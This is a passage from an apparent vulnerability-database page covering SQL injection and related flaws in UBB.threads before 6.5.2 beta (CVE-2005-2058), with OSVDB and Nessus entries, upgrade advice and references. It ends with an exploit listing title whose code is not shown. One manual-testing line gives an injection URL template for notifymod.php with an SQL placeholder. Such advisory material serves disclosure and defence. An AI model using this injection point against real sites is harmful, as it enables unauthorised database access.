OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17530", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17531", "type": "osvdb", "title": "UBB.threads notifymod.php Number Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'notifymod.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'notifymod.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17531", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}], "nessus": [{"id": "UBBTHREADS_PRINTTHREAD_SQL_INJECTION.NASL", "type": "nessus", "title": "UBB.threads < 6.5.2 beta Multiple Vulnerabilities", "description": "The remote host is running a version of UBB.threads that suffers from multiple vulnerabilities due to insufficient input validation - local file inclusion, HTTP response splitting, SQL injection, and cross-site scripting. These flaws may allow an attacker to completely compromise the affected installation of UBB.threads.", "published": "2005-04-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18098", "cvelist": ["CVE-2005-1199", "CVE-2005-2058", "CVE-2005-2060", "CVE-2005-2061", "CVE-2005-2057", "CVE-2005-2059"], "lastseen": "2016-09-26T17:26:44"}]}}

UBB Threads &lt; 6.5.2 Beta mailthread.php SQL Injection Exploit

Description

UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit. CVE-2005-2058. Webapps exploit for php platform

UBB Threads < 6.5.2 Beta mailthread.php SQL Injection Exploit